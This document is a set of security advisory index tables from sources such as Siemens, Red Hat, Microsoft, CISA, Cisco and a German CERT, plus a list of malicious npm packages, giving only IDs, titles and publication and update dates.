mal-2024-11183 Malicious code in @solana/web3.js (npm) 2024-12-03T22:45:37Z 2024-12-05T00:35:14Z
mal-2024-10909 Malicious code in lunar-root (npm) 2024-11-24T23:02:20Z 2024-12-05T00:35:14Z
mal-2024-10908 Malicious code in jigasi-haproxy-agent (npm) 2024-11-24T18:18:29Z 2024-12-05T00:35:14Z
mal-2024-10907 Malicious code in generate-release-description (npm) 2024-11-24T22:43:11Z 2024-12-05T00:35:14Z
mal-2024-10906 Malicious code in eth-based-p2p-e2e-latency (npm) 2024-11-24T20:26:35Z 2024-12-05T00:35:14Z
mal-2024-10905 Malicious code in dashlane-vscode (npm) 2024-11-24T15:55:46Z 2024-12-05T00:35:14Z
mal-2024-10904 Malicious code in d1-northwind (npm) 2024-11-24T22:07:48Z 2024-12-05T00:35:14Z
mal-2024-10903 Malicious code in clarity-vs-code-web-client (npm) 2024-11-24T23:51:51Z 2024-12-05T00:35:14Z
mal-2024-10902 Malicious code in clarity-lsp (npm) 2024-11-25T00:20:45Z 2024-12-05T00:35:14Z
mal-2024-10562 Malicious code in mongoose-4 (npm) 2024-11-08T14:24:20Z 2024-12-05T00:35:14Z
mal-2024-10560 Malicious code in immutable-axelar-bridge (npm) 2024-11-07T23:29:15Z 2024-12-05T00:35:14Z
mal-2024-10559 Malicious code in embrace-helloworld (npm) 2024-11-08T11:40:54Z 2024-12-05T00:35:14Z
mal-2024-10558 Malicious code in dancer-pipeline (npm) 2024-11-08T13:15:53Z 2024-12-05T00:35:14Z
mal-2024-10557 Malicious code in com.immutable.orderbook (npm) 2024-11-08T00:08:13Z 2024-12-05T00:35:14Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
wid-sec-w-2025-1428 sudo: Mehrere Schwachstellen 2025-06-30T22:00:00.000+00:00 2025-09-29T22:00:00.000+00:00
wid-sec-w-2025-2140 GitLab: Mehrere Schwachstellen 2025-09-25T22:00:00.000+00:00 2025-09-28T22:00:00.000+00:00
wid-sec-w-2025-2134 Red Hat Enterprise Linux (Developer Hub): Schwachstelle ermöglicht Denial of Service 2025-09-25T22:00:00.000+00:00 2025-09-25T22:00:00.000+00:00
wid-sec-w-2025-2133 Nagios Enterprises Nagios XI: Schwachstelle ermöglicht Ausführen von beliebigem Programmcode 2025-09-25T22:00:00.000+00:00 2025-09-25T22:00:00.000+00:00
wid-sec-w-2025-2117 Google Chrome / Microsoft Edge: Mehrere Schwachstellen 2025-09-23T22:00:00.000+00:00 2025-09-25T22:00:00.000+00:00
wid-sec-w-2025-2119 Cisco Industrial Ethernet Switches: Schwachstelle ermöglicht Denial of Service 2025-09-24T22:00:00.000+00:00 2025-09-24T22:00:00.000+00:00
wid-sec-w-2025-1989 SAP Patchday September 2025: Mehrere Schwachstellen 2025-09-08T22:00:00.000+00:00 2025-09-23T22:00:00.000+00:00
wid-sec-w-2025-2099 Linux Kernel: Mehrere Schwachstellen 2025-09-21T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-2077 Linux Kernel: Mehrere Schwachstellen 2025-09-16T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-2074 Mozilla Firefox, Firefox ESR und Thunderbird: Mehrere Schwachstellen 2025-09-16T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-2053 Linux Kernel: Mehrere Schwachstellen 2025-09-15T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-2051 Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service 2025-09-14T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-2040 Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service 2025-09-11T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-2007 Xen: Mehrere Schwachstellen 2025-09-09T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-1988 Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service 2025-09-07T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-1987 Keycloak: Mehrere Schwachstellen 2025-09-07T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-1976 Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service 2025-09-04T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-1961 Django (FilteredRelation): Schwachstelle ermöglicht SQL injection 2025-09-03T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-1933 Linux Kernel: Eine Schwachstelle ermöglicht einen Denial of Service 2025-08-31T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-1932 Wireshark: Schwachstelle ermöglicht Denial of Service 2025-08-28T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-1931 Linux Kernel: Schwachstelle ermöglicht Privilegieneskalation 2025-08-28T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-1921 Linux Kernel: Schwachstelle ermöglicht Denial of Service 2025-08-27T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-1914 Linux Kernel: Schwachstelle ermöglicht Codeausführung 2025-08-26T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-1898 Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service 2025-08-24T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-1892 Keycloak: Schwachstelle ermöglicht Offenlegung von Informationen 2025-08-21T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-1869 Linux Kernel: Mehrere Schwachstellen 2025-08-19T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-1862 Linux Kernel: Schwachstelle ermöglicht Denial of Service 2025-08-18T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-1858 Linux Kernel: Mehrere Schwachstellen 2025-08-17T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-1830 http/2 Implementierungen: Schwachstelle ermöglicht Denial of Service 2025-08-13T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
wid-sec-w-2025-1810 Linux Kernel: Schwachstelle ermöglicht Denial of Service 2025-08-12T22:00:00.000+00:00 2025-09-22T22:00:00.000+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
ssa-916339 SSA-916339: Information Disclosure Vulnerability in Apogee PXC and Talon TC Devices 2025-09-09T00:00:00Z 2025-09-09T00:00:00Z
ssa-864900 SSA-864900: Multiple Vulnerabilities in Fortigate NGFW on RUGGEDCOM APE1808 Devices 2025-05-13T00:00:00Z 2025-09-09T00:00:00Z
ssa-722410 SSA-722410: Multiple Vulnerabilities in User Management Component (UMC) 2025-09-09T00:00:00Z 2025-09-09T00:00:00Z
ssa-712929 SSA-712929: Denial of Service Vulnerability in OpenSSL (CVE-2022-0778) Affecting Industrial Products 2022-06-14T00:00:00Z 2025-09-09T00:00:00Z
ssa-691715 SSA-691715: Vulnerability in OPC Foundation Local Discovery Server Affecting Siemens Products 2023-04-11T00:00:00Z 2025-09-09T00:00:00Z
ssa-640476 SSA-640476: Denial of Service Vulnerability in Industrial Edge Management 2025-09-09T00:00:00Z 2025-09-09T00:00:00Z
ssa-563922 SSA-563922: Local Privilege Escalation Vulnerability in SIMOTION Tools 2025-09-09T00:00:00Z 2025-09-09T00:00:00Z
ssa-534283 SSA-534283: Insecure File Share Vulnerability in SIMATIC Virtualization as a Service (SIVaaS) 2025-09-09T00:00:00Z 2025-09-09T00:00:00Z
ssa-503939 SSA-503939: Vulnerabilities in the BIOS of the SIMATIC S7-1500 TM MFP 2025-03-11T00:00:00Z 2025-09-09T00:00:00Z
ssa-494539 SSA-494539: Multiple Vulnerabilities in SINEC OS 2025-09-09T00:00:00Z 2025-09-09T00:00:00Z
ssa-366067 SSA-366067: Multiple Vulnerabilities in Fortigate NGFW Before V7.4.1 on RUGGEDCOM APE1808 Devices 2024-03-12T00:00:00Z 2025-09-09T00:00:00Z
ssa-331739 SSA-331739: Privilege Escalation Vulnerability in WIBU CodeMeter Runtime Affecting Siemens Products 2025-08-12T00:00:00Z 2025-09-09T00:00:00Z
ssa-282044 SSA-282044: DLL Hijacking Vulnerability in Siemens Web Installer used by the Online Software Delivery 2025-08-12T00:00:00Z 2025-09-09T00:00:00Z
ssa-265688 SSA-265688: Vulnerabilities in the additional GNU/Linux subsystem of the SIMATIC S7-1500 TM MFP V1.1 2024-04-09T00:00:00Z 2025-09-09T00:00:00Z
ssa-027652 SSA-027652: Privilege Escalation Vulnerability in SINAMICS Drives 2025-09-09T00:00:00Z 2025-09-09T00:00:00Z
ssa-707630 SSA-707630: Multiple Vulnerabilities in SIMATIC RTLS Locating Manager Before V3.3 2025-08-12T00:00:00Z 2025-08-26T00:00:00Z
ssa-201595 SSA-201595: Privilege Escalation Vulnerability in WIBU CodeMeter Runtime Affecting the Desigo CC Product Family and SENTRON Powermanager 2025-08-14T00:00:00Z 2025-08-19T00:00:00Z
ssa-711309 SSA-711309: Denial of Service Vulnerability in the OPC UA Implementations of SIMATIC Products 2023-09-12T00:00:00Z 2025-08-18T00:00:00Z
ssa-395458 SSA-395458: Account Hijacking Vulnerability in Mendix SAML Module 2025-08-14T00:00:00Z 2025-08-14T00:00:00Z
ssa-028723 SSA-028723: Multiple OpenSSL Vulnerabilities in BFCClient Before V2.17 2025-08-12T00:00:00Z 2025-08-13T00:00:00Z
ssa-994087 SSA-994087: Multiple SQLite Vulnerabilities in RUGGEDCOM CROSSBOW Station Access Controller Before V5.7 2025-08-12T00:00:00Z 2025-08-12T00:00:00Z
ssa-978177 SSA-978177: Vulnerability in Nozomi Guardian/CMC on RUGGEDCOM APE1808 Devices 2025-08-12T00:00:00Z 2025-08-12T00:00:00Z
ssa-914892 SSA-914892: Race Condition Vulnerability in Basic Authentication Implementation of Mendix Runtime 2024-11-12T00:00:00Z 2025-08-12T00:00:00Z
ssa-908185 SSA-908185: Mirror Port Isolation Vulnerability in RUGGEDCOM ROS Devices 2023-08-08T00:00:00Z 2025-08-12T00:00:00Z
ssa-894058 SSA-894058: Improper Bandwidth Limitation of Network Packets Over Local USB Port Vulnerability in SIPROTEC 5 2025-08-12T00:00:00Z 2025-08-12T00:00:00Z
ssa-856721 SSA-856721: Vulnerability in RUGGEDCOM Discovery Protocol (RCDP) of Industrial Communication Devices 2017-09-28T00:00:00Z 2025-08-12T00:00:00Z
ssa-840800 SSA-840800: Code Injection Vulnerability in RUGGEDCOM ROS 2022-07-12T00:00:00Z 2025-08-12T00:00:00Z
ssa-800126 SSA-800126: Deserialization Vulnerability in Siemens Engineering Platforms before V20 2024-12-10T00:00:00Z 2025-08-12T00:00:00Z
ssa-794185 SSA-794185: RADIUS Protocol Susceptible to Forgery Attacks (CVE-2024-3596) - Impact to SIPROTEC, SICAM and Related Products 2025-05-13T00:00:00Z 2025-08-12T00:00:00Z
ssa-787941 SSA-787941: Denial of Service Vulnerability in RUGGEDCOM ROS devices 2022-11-08T00:00:00Z 2025-08-12T00:00:00Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
rhsa-2025:6966 Red Hat Security Advisory: kernel security update 2025-05-13T08:28:50+00:00 2025-09-30T17:58:13+00:00
rhsa-2025:9646 Red Hat Security Advisory: OpenShift API for Data Protection (OADP) 1.3.7 security and bug fix update 2025-06-25T14:06:29+00:00 2025-09-30T17:13:00+00:00
rhsa-2025:9541 Red Hat Security Advisory: Submariner 0.17.6 bug fixes and container updates 2025-06-24T14:31:21+00:00 2025-09-30T17:13:00+00:00
rhsa-2025:9388 Red Hat Security Advisory: Red Hat Multicluster GlobalHub 1.2.3 bug fixes and container updates 2025-06-23T15:10:48+00:00 2025-09-30T17:13:00+00:00
rhsa-2025:8510 Red Hat Security Advisory: Migration Toolkit for Containers (MTC) 1.8.7 security and bug fix update 2025-06-04T12:26:00+00:00 2025-09-30T17:13:00+00:00
rhsa-2025:9259 Red Hat Security Advisory: OpenShift Container Platform 4.15.53 bug fix and security update 2025-06-26T01:50:03+00:00 2025-09-30T17:12:59+00:00
rhsa-2025:9167 Red Hat Security Advisory: Red Hat build of OpenTelemetry 3.6.0 release 2025-06-17T09:27:34+00:00 2025-09-30T17:12:59+00:00
rhsa-2025:8691 Red Hat Security Advisory: RHSA: Submariner 0.20.1 - bug fix and enhancement update 2025-06-09T14:26:17+00:00 2025-09-30T17:12:58+00:00
rhsa-2025:8560 Red Hat Security Advisory: OpenShift Container Platform 4.18.17 bug fix and security update 2025-06-10T06:26:36+00:00 2025-09-30T17:12:57+00:00
rhsa-2025:8556 Red Hat Security Advisory: OpenShift Container Platform 4.16.42 bug fix and security update 2025-06-13T05:16:43+00:00 2025-09-30T17:12:57+00:00
rhsa-2025:8552 Red Hat Security Advisory: OpenShift Container Platform 4.17.33 bug fix and security update 2025-06-11T12:02:51+00:00 2025-09-30T17:12:57+00:00
rhsa-2025:8544 Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.15.14 Bug Fix Update 2025-06-04T20:11:19+00:00 2025-09-30T17:12:56+00:00
rhsa-2025:8542 Red Hat Security Advisory: Red Hat Advanced Cluster Management 2.13.3 fixes and container updates 2025-06-04T21:17:49+00:00 2025-09-30T17:12:56+00:00
rhsa-2025:8479 Red Hat Security Advisory: RHODF-4.16-RHEL-9 security update 2025-06-04T01:58:44+00:00 2025-09-30T17:12:55+00:00
rhsa-2025:8392 Red Hat Security Advisory: Red Hat Advanced Cluster Management 2.9.9 bug fixes and container updates 2025-06-04T00:41:53+00:00 2025-09-30T17:12:55+00:00
rhsa-2025:8390 Red Hat Security Advisory: Multicluster Engine for Kubernetes 2.4.9 security updates and bug fixes 2025-06-02T17:37:18+00:00 2025-09-30T17:12:55+00:00
rhsa-2025:8384 Red Hat Security Advisory: Red Hat multicluster global hub 1.4.1 bug fixes and container updates 2025-06-02T14:56:45+00:00 2025-09-30T17:12:54+00:00
rhsa-2025:8274 Red Hat Security Advisory: Errata Advisory for Red Hat OpenShift GitOps v1.14.4 security update 2025-05-28T20:39:49+00:00 2025-09-30T17:12:53+00:00
rhsa-2025:8267 Red Hat Security Advisory: osbuild-composer security update 2025-05-28T15:24:18+00:00 2025-09-30T17:12:53+00:00
rhsa-2025:8244 Red Hat Security Advisory: Red Hat OpenShift Dev Spaces 3.21.0 release 2025-05-28T02:39:39+00:00 2025-09-30T17:12:53+00:00
rhsa-2025:8075 Red Hat Security Advisory: osbuild-composer security update 2025-05-21T15:37:30+00:00 2025-09-30T17:12:52+00:00
rhsa-2025:8059 Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.17.7 Bug Fix Update 2025-05-21T06:13:16+00:00 2025-09-30T17:12:52+00:00
rhsa-2025:7967 Red Hat Security Advisory: osbuild-composer security update 2025-05-19T09:52:50+00:00 2025-09-30T17:12:52+00:00
rhsa-2025:7753 Red Hat Security Advisory: Errata Advisory for Red Hat OpenShift GitOps v1.15.2 security update 2025-05-15T17:09:32+00:00 2025-09-30T17:12:52+00:00
rhsa-2025:7702 Red Hat Security Advisory: OpenShift Container Platform 4.14.52 bug fix and security update 2025-05-21T14:54:27+00:00 2025-09-30T17:12:52+00:00
rhsa-2025:7503 Red Hat Security Advisory: osbuild-composer security update 2025-05-13T17:31:03+00:00 2025-09-30T17:12:51+00:00
rhsa-2025:7479 Red Hat Security Advisory: opentelemetry-collector security update 2025-05-13T17:18:27+00:00 2025-09-30T17:12:51+00:00
rhsa-2025:7475 Red Hat Security Advisory: grafana security update 2025-05-13T16:00:56+00:00 2025-09-30T17:12:50+00:00
rhsa-2025:7425 Red Hat Security Advisory: osbuild-composer security update 2025-05-13T13:57:39+00:00 2025-09-30T17:12:49+00:00
rhsa-2025:7407 Red Hat Security Advisory: opentelemetry-collector security update 2025-05-13T13:53:53+00:00 2025-09-30T17:12:49+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
msrc_cve-2025-59251 Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-25T07:00:00.000Z
msrc_cve-2025-55232 Microsoft High Performance Compute (HPC) Pack Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-25T07:00:00.000Z
msrc_cve-2025-55322 OmniParser Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-24T07:00:00.000Z
msrc_cve-2025-59220 Windows Bluetooth Service Elevation of Privilege Vulnerability 2025-09-09T07:00:00.000Z 2025-09-18T07:00:00.000Z
msrc_cve-2025-59216 Windows Graphics Component Elevation of Privilege Vulnerability 2025-09-09T07:00:00.000Z 2025-09-18T07:00:00.000Z
msrc_cve-2025-59215 Windows Graphics Component Elevation of Privilege Vulnerability 2025-09-09T07:00:00.000Z 2025-09-18T07:00:00.000Z
msrc_cve-2025-55241 Azure Entra ID Elevation of Privilege Vulnerability 2025-09-09T07:00:00.000Z 2025-09-18T07:00:00.000Z
msrc_cve-2025-50154 Microsoft Windows File Explorer Spoofing Vulnerability 2025-08-12T07:00:00.000Z 2025-09-17T07:00:00.000Z
msrc_cve-2025-54910 Microsoft Office Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-16T07:00:00.000Z
msrc_cve-2025-54906 Microsoft Office Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-16T07:00:00.000Z
msrc_cve-2025-54905 Microsoft Word Information Disclosure Vulnerability 2025-09-09T07:00:00.000Z 2025-09-16T07:00:00.000Z
msrc_cve-2025-54904 Microsoft Excel Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-16T07:00:00.000Z
msrc_cve-2025-54903 Microsoft Excel Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-16T07:00:00.000Z
msrc_cve-2025-54902 Microsoft Excel Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-16T07:00:00.000Z
msrc_cve-2025-54901 Microsoft Excel Information Disclosure Vulnerability 2025-09-09T07:00:00.000Z 2025-09-16T07:00:00.000Z
msrc_cve-2025-54900 Microsoft Excel Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-16T07:00:00.000Z
msrc_cve-2025-54899 Microsoft Excel Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-16T07:00:00.000Z
msrc_cve-2025-54898 Microsoft Excel Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-16T07:00:00.000Z
msrc_cve-2025-54896 Microsoft Excel Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-16T07:00:00.000Z
msrc_cve-2025-49728 Microsoft PC Manager Security Feature Bypass Vulnerability 2025-09-09T07:00:00.000Z 2025-09-16T07:00:00.000Z
msrc_cve-2025-47967 Microsoft Edge (Chromium-based) for Android Spoofing Vulnerability 2025-09-09T07:00:00.000Z 2025-09-16T07:00:00.000Z
msrc_cve-2025-55319 Agentic AI and Visual Studio Code Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-12T07:00:00.000Z
msrc_cve-2025-49734 PowerShell Direct Elevation of Privilege Vulnerability 2025-09-09T07:00:00.000Z 2025-09-11T07:00:00.000Z
msrc_cve-2025-55317 Microsoft AutoUpdate (MAU) Elevation of Privilege Vulnerability 2025-09-09T07:00:00.000Z 2025-09-09T07:00:00.000Z
msrc_cve-2025-55316 Azure Connected Machine Agent Elevation of Privilege Vulnerability 2025-09-09T07:00:00.000Z 2025-09-09T07:00:00.000Z
msrc_cve-2025-55245 Xbox Gaming Services Elevation of Privilege Vulnerability 2025-09-09T07:00:00.000Z 2025-09-09T07:00:00.000Z
msrc_cve-2025-55243 Microsoft OfficePlus Spoofing Vulnerability 2025-09-09T07:00:00.000Z 2025-09-09T07:00:00.000Z
msrc_cve-2025-55236 Graphics Kernel Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-09T07:00:00.000Z
msrc_cve-2025-55234 Windows SMB Elevation of Privilege Vulnerability 2025-09-09T07:00:00.000Z 2025-09-09T07:00:00.000Z
msrc_cve-2025-55228 Windows Graphics Component Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-09T07:00:00.000Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
va-25-272-01 Medical Informatics Engineering Enterprise Health multiple vulnerabilities 2025-09-29T00:00:00Z 2025-09-29T00:00:00Z
icsa-25-268-01 Dingtian DT-R002 2025-09-25T06:00:00.000000Z 2025-09-25T06:00:00.000000Z
icsa-25-266-04 Viessmann Vitogate 300 2025-09-23T06:00:00.000000Z 2025-09-23T06:00:00.000000Z
icsa-25-266-02 Mitsubishi Electric MELSEC-Q Series CPU Module 2025-09-23T06:00:00.000000Z 2025-09-23T06:00:00.000000Z
icsa-25-266-01 AutomationDirect CLICK PLUS 2025-09-23T06:00:00.000000Z 2025-09-23T06:00:00.000000Z
va-25-265-01 Airship AI MFA bypass and default credentials vulnerabilities 2025-09-22T14:06:13Z 2025-09-22T14:06:13Z
icsa-25-261-07 Dover Fueling Solutions ProGauge MagLink LX4 Devices 2025-09-18T06:00:00.000000Z 2025-09-18T06:00:00.000000Z
icsa-25-261-06 Cognex In-Sight Explorer and In-Sight Camera Firmware 2025-09-18T06:00:00.000000Z 2025-09-18T06:00:00.000000Z
icsa-25-261-03 Schneider Electric Saitel DR & Saitel DP Remote Terminal Unit 2025-09-18T06:00:00.000000Z 2025-09-18T06:00:00.000000Z
icsa-25-261-02 Westermo Network Technologies WeOS 5 2025-09-18T06:00:00.000000Z 2025-09-18T06:00:00.000000Z
icsa-25-261-01 Westermo Network Technologies WeOS 5 2025-09-18T06:00:00.000000Z 2025-09-18T06:00:00.000000Z
icsa-25-254-10 Daikin Europe N.V Security Gateway 2025-09-11T06:00:00.000000Z 2025-09-18T06:00:00.000000Z
icsa-25-191-10 End-of-Train and Head-of-Train Remote Linking Protocol (Update C) 2025-07-10T06:00:00.000000Z 2025-09-18T06:00:00.000000Z
icsa-24-030-02 Mitsubishi Electric FA Engineering Software Products (Update D) 2024-01-30T07:00:00.000000Z 2025-09-18T06:00:00.000000Z
icsa-25-259-07 Delta Electronics DIALink 2025-09-16T06:00:00.000000Z 2025-09-16T06:00:00.000000Z
icsa-25-259-05 Siemens OpenSSL Vulnerability in Industrial Products 2025-09-16T06:00:00.000000Z 2025-09-16T06:00:00.000000Z
icsa-25-259-03 Siemens SIMATIC NET CP, SINEMA and SCALANCE 2025-09-16T06:00:00.000000Z 2025-09-16T06:00:00.000000Z
icsa-25-259-02 Hitachi Energy RTU500 series 2025-09-16T06:00:00.000000Z 2025-09-16T06:00:00.000000Z
va-25-259-01 CISA Thorium multiple vulnerabilities 2025-09-16T00:00:00Z 2025-09-16T00:00:00Z
va-25-258-01 psPAS does not enforce TLS 1.2 within Get-PASSAMLResponse 2025-09-15T18:41:08Z 2025-09-15T18:41:08Z
va-25-174-01 OPEXUS FOIAXpress Public Access Link (PAL) multiple vulnerabilities 2025-07-31T17:01:09Z 2025-09-09T21:12:34Z
va-25-252-01 OPEXUS FOIAXpress Public Access Link (PAL) SQL injection 2025-09-09T20:48:26Z 2025-09-09T20:48:26Z
icsa-25-093-01 Hitachi Energy RTU500 Series (Update B) 2025-03-25T12:30:00.000000Z 2025-09-09T12:30:00.000000Z
icsa-25-023-02 Hitachi Energy RTU500 Series Product (Update A) 2024-04-30T12:30:00.000000Z 2025-09-09T10:00:00.000000Z
icsa-25-252-09 Rockwell Automation 1783-NATR 2025-09-09T06:00:00.000000Z 2025-09-09T06:00:00.000000Z
icsa-25-252-08 Rockwell Automation Analytics LogixAI 2025-09-09T06:00:00.000000Z 2025-09-09T06:00:00.000000Z
icsa-25-252-07 Rockwell Automation ControlLogix 5580 2025-09-09T06:00:00.000000Z 2025-09-09T06:00:00.000000Z
icsa-25-252-06 Rockwell Automation CompactLogix® 5480 2025-09-09T06:00:00.000000Z 2025-09-09T06:00:00.000000Z
icsa-25-252-05 Rockwell Automation FactoryTalk Activation Manager 2025-09-09T06:00:00.000000Z 2025-09-09T06:00:00.000000Z
icsa-25-252-04 Rockwell Automation FactoryTalk Optix 2025-09-09T06:00:00.000000Z 2025-09-09T06:00:00.000000Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
cisco-sa-snmp-x4lphte Cisco IOS and IOS XE Software SNMP Denial of Service and Remote Code Execution Vulnerability 2025-09-24T16:00:00+00:00 2025-09-30T16:15:10+00:00
cisco-sa-cat9k-ptmd7bgy Cisco IOS XE Software for Catalyst 9000 Series Switches Denial of Service Vulnerability 2025-09-24T16:00:00+00:00 2025-09-30T14:26:46+00:00
cisco-sa-asaftd-webvpn-yrootuw Cisco Secure Firewall Adaptive Security Appliance Software and Secure Firewall Threat Defense Software VPN Web Server Unauthorized Access Vulnerability 2025-09-25T16:00:00+00:00 2025-09-26T16:35:51+00:00
cisco-sa-ap-ipv6-gw-tuazpn9o Cisco Access Point Software Intermittent IPv6 Gateway Change Vulnerability 2025-09-24T16:00:00+00:00 2025-09-26T16:35:51+00:00
cisco-sa-webui-xss-vwydgjou Cisco IOS XE Software Web Authentication Reflected Cross-Site Scripting Vulnerability 2025-09-24T16:00:00+00:00 2025-09-26T16:35:50+00:00
cisco-sa-http-code-exec-wmfp3h3o Cisco Secure Firewall Adaptive Security Appliance Software, Secure Firewall Threat Defense Software, IOS Software, IOS XE Software, and IOS XR Software Web Services Remote Code Execution Vulnerability 2025-09-25T16:00:00+00:00 2025-09-25T16:00:00+00:00
cisco-sa-asaftd-webvpn-z5xp8eub Cisco Secure Firewall Adaptive Security Appliance Software and Secure Firewall Threat Defense Software VPN Web Server Remote Code Execution Vulnerability 2025-09-25T16:00:00+00:00 2025-09-25T16:00:00+00:00
cisco-sa-snmpwred-x3mjyf5m Cisco IOS XE Software Simple Network Management Protocol Denial of Service Vulnerability 2025-09-24T16:00:00+00:00 2025-09-24T16:00:00+00:00
cisco-sa-secboot-uqfd8avc Cisco IOS XE Software Secure Boot Bypass Vulnerabilities 2025-09-24T16:00:00+00:00 2025-09-24T16:00:00+00:00
cisco-sa-nbar-dos-lavwtmet Cisco IOS XE Software Network-Based Application Recognition Denial of Service Vulnerability 2025-09-24T16:00:00+00:00 2025-09-24T16:00:00+00:00
cisco-sa-iosxe-arg-inject-eyddbh4e Cisco IOS XE Software CLI Argument Injection Vulnerability 2025-09-24T16:00:00+00:00 2025-09-24T16:00:00+00:00
cisco-sa-ios-xe-cmd-inject-rpjm8bgl Cisco IOS XE Software HTTP API Command Injection Vulnerability 2025-09-24T16:00:00+00:00 2025-09-24T16:00:00+00:00
cisco-sa-ios-tacacs-hdb7thjw Cisco IOS and IOS XE Software TACACS+ Authentication Bypass Vulnerability 2025-09-24T16:00:00+00:00 2025-09-24T16:00:00+00:00
cisco-sa-ios-invalid-url-dos-nvxszf6u Cisco IOS Software Industrial Ethernet Switch Device Manager Denial of Service Vulnerability 2025-09-24T16:00:00+00:00 2025-09-24T16:00:00+00:00
cisco-sa-ios-cli-eb7cz6yo Cisco IOS and IOS XE Software CLI Denial of Service Vulnerability 2025-09-24T16:00:00+00:00 2025-09-24T16:00:00+00:00
cisco-sa-defaultacl-psjk9nvf Cisco SD-WAN vEdge Software Access Control List Bypass Vulnerability 2025-09-24T16:00:00+00:00 2025-09-24T16:00:00+00:00
cisco-sa-cat9k-acl-l4k7vxgd Cisco IOS XE Software on Cisco Catalyst 9500X and 9600X Series Switches Virtual Interface Access Control List Bypass Vulnerability 2025-09-24T16:00:00+00:00 2025-09-24T16:00:00+00:00
cisco-sa-action-frame-inj-qqcncz8h Cisco Wireless Access Point Software Device Analytics Action Frame Injection Vulnerability 2025-09-24T16:00:00+00:00 2025-09-24T16:00:00+00:00
cisco-sa-9800cl-openscep-sb4xtxzp Cisco IOS XE Software for Catalyst 9800 Series Wireless Controller for Cloud Unauthenticated Access to Certificate Enrollment Service Vulnerability 2025-09-24T16:00:00+00:00 2025-09-24T16:00:00+00:00
cisco-sa-snmp-bypass-hhuvujdn Cisco IOS XE SD-WAN Software Packet Filtering Bypass Vulnerability 2025-05-07T16:00:00+00:00 2025-09-22T14:12:28+00:00
cisco-sa-xrsig-uy4zrucg Cisco IOS XR Software Image Verification Bypass Vulnerability 2025-09-10T16:00:00+00:00 2025-09-10T16:00:00+00:00
cisco-sa-iosxr-arp-storm-ejuu55ym Cisco IOS XR ARP Broadcast Storm Denial of Service Vulnerability 2025-09-10T16:00:00+00:00 2025-09-10T16:00:00+00:00
cisco-sa-acl-packetio-swjhhbtz Cisco IOS XR Software Management Interface ACL Bypass Vulnerability 2025-09-10T16:00:00+00:00 2025-09-10T16:00:00+00:00
cisco-sa-fp2k-ipsec-dos-tjwgdzco Cisco Secure Firewall Adaptive Security Appliance and Secure Firewall Threat Defense Software for Firepower 2100 Series IPv6 over IPsec Denial of Service Vulnerability 2025-08-14T16:00:00+00:00 2025-09-09T21:22:34+00:00
cisco-sa-webex-xss-55bv8hhm Cisco Webex Meetings Cross-Site Scripting Vulnerability 2025-09-03T16:00:00+00:00 2025-09-03T16:00:00+00:00
cisco-sa-webex-urlredirect-uk8ddjsz Cisco Webex Meetings URL Redirection Vulnerability 2025-09-03T16:00:00+00:00 2025-09-03T16:00:00+00:00
cisco-sa-phone-write-g3kcc5df Cisco Desk Phone 9800 Series, IP Phone 7800 and 8800 Series, and Video Phone 8875 with SIP Software Vulnerabilities 2025-09-03T16:00:00+00:00 2025-09-03T16:00:00+00:00
